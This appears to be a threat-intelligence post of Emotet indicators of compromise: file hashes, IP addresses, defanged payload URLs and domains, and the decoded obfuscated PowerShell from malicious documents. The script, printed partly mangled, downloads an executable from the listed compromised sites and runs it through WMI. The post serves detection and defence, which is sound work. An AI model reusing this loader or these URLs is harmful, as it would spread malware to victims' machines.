Emotet_Doc_out_2020-10-29_23_40.txt

1. #Emotet #Docs #malware #OSINT #IOC
2.  
3. SHA256:
4. 092fb8ce8a290c30630339fea8ac407a76fcd39e31a62aef7b4d0c917b31da5e
5. 220c19f5b011876c257bc3e3e48c3b032be339e535a8e93b564bfbe65ea86610
6. 220c19f5b011876c257bc3e3e48c3b032be339e535a8e93b564bfbe65ea86610
7. 93edcc5c13cef6e563c7c530cf9462e92dd1c80495800814540c045a9fc2cabf
8.  
9.  
10. IPs:
11. 104.18.63.171
12. 104.28.18.90
13. 104.28.22.149
14. 104.28.23.149
15. 104.28.6.70
16. 104.28.7.70
17. 141.98.10.47
18. 172.67.132.92
19. 172.67.133.164
20. 172.67.180.161
21. 35.213.176.43
22.  
23.  
24.  
25. URLs:
26. hxxps://enjoymylifecheryl.com/wp-includes/FPNxoUiCz3/
27. hxxps://homewatchamelia.com/wp-admin/qmK/
28. hxxps://seramporemunicipality.org/replacement-vin/Ql4R/
29. hxxps://imperfectdream.com/wp-content/xb2csjPW6/
30. hxxps://mayxaycafe.net/wp-includes/UxdWFzYQj/
31. hxxps://420extracts.ca/cgi-bin/Ecv/
32. hxxps://casinopalacett.com/wp-admin/voZDArg/
33.  
34.  
35. Domains:
36. enjoymylifecheryl.com
37. homewatchamelia.com
38. seramporemunicipality.org
39. imperfectdream.com
40. mayxaycafe.net
41. 420extracts.ca
42. casinopalacett.com
43.  
44.  
45. Decoded Base64 Powershell:
46. <���^, $8P4vcu = [tyPe]"{5}{2}{0}{3}{1}{4}" -f M.i,O,yste,O.dIrect,Ry,S ;
47. SeT LsV0 [tYpe]"{5}{0}{3}{1}{2}{4}{6}" -F.NE,V,IcEp,T.SeR,oInTmAnAG,sYSTeM,er ;
48. $Rlrkjnw=Qr1ru9y;
49. $D7qz32b=$Wa6rea4 [char]64 $Dehv673;
50. $O5aqk3g=Xa7q3h0;
51. dIr VARiAble:8P4Vcu.valuE::"cre`ATeD`IReCT`oRY"$HOME {0}Nscs8ry{0}S9t4g_l{0} -F [CHAr]92;
52. $Ga8ff5s=Nffefbg;
53. $lSv0::"sE`cU`Rit`yProToCOl" = Tls12;
54. $Ru818ii=Vzvdenv;
55. $G9po_gt = Epl6_wa2m;
56. $Yfwba66=Thli7b3;
57. $Irioufu=Y22l3ct;
58. $Llo6n_w=$HOME{0}Nscs8ry{0}S9t4g_l{0} -F [ChAR]92$G9po_gt.exe;
59. $Jvjds4y=G_wnx9u;
60. $H5xr5lm=.new-object nEt.webcLIENt;
61. $Mmo41vn=hxxps://enjoymylifecheryl.com/wp-includes/FPNxoUiCz3/
62. hxxps://homewatchamelia.com/wp-admin/qmK/
63. hxxps://seramporemunicipality.org/replacement-vin/Ql4R/
64. hxxps://imperfectdream.com/wp-content/xb2csjPW6/
65. hxxps://mayxaycafe.net/wp-includes/UxdWFzYQj/
66. hxxps://420extracts.ca/cgi-bin/Ecv/
67. hxxps://casinopalacett.com/wp-admin/voZDArg/."r`EP`Lace"/,[array]/,xwe[0]."sPl`It"$Chkut94 $D7qz32b $Opdketn;
68. $Rf7k3zk=Usfuthv;
69. foreach $Uhbkd7k in $Mmo41vn{try{$H5xr5lm."dO`wnl`Oa`DfIlE"$Uhbkd7k, $Llo6n_w;
70. $Fsiu4_x=Urtdzox;
71. If .Get-Item $Llo6n_w."Len`GTh" -ge 44263 {[wmiclass]win32_Process."Cre`A`Te"$Llo6n_w;
72. $Yzrcjro=T2a4ijn;
73. break;
74. $Ccwk57z=Lslfh6p}}catch{}}$L9wtd00=Vxbiwxu
75.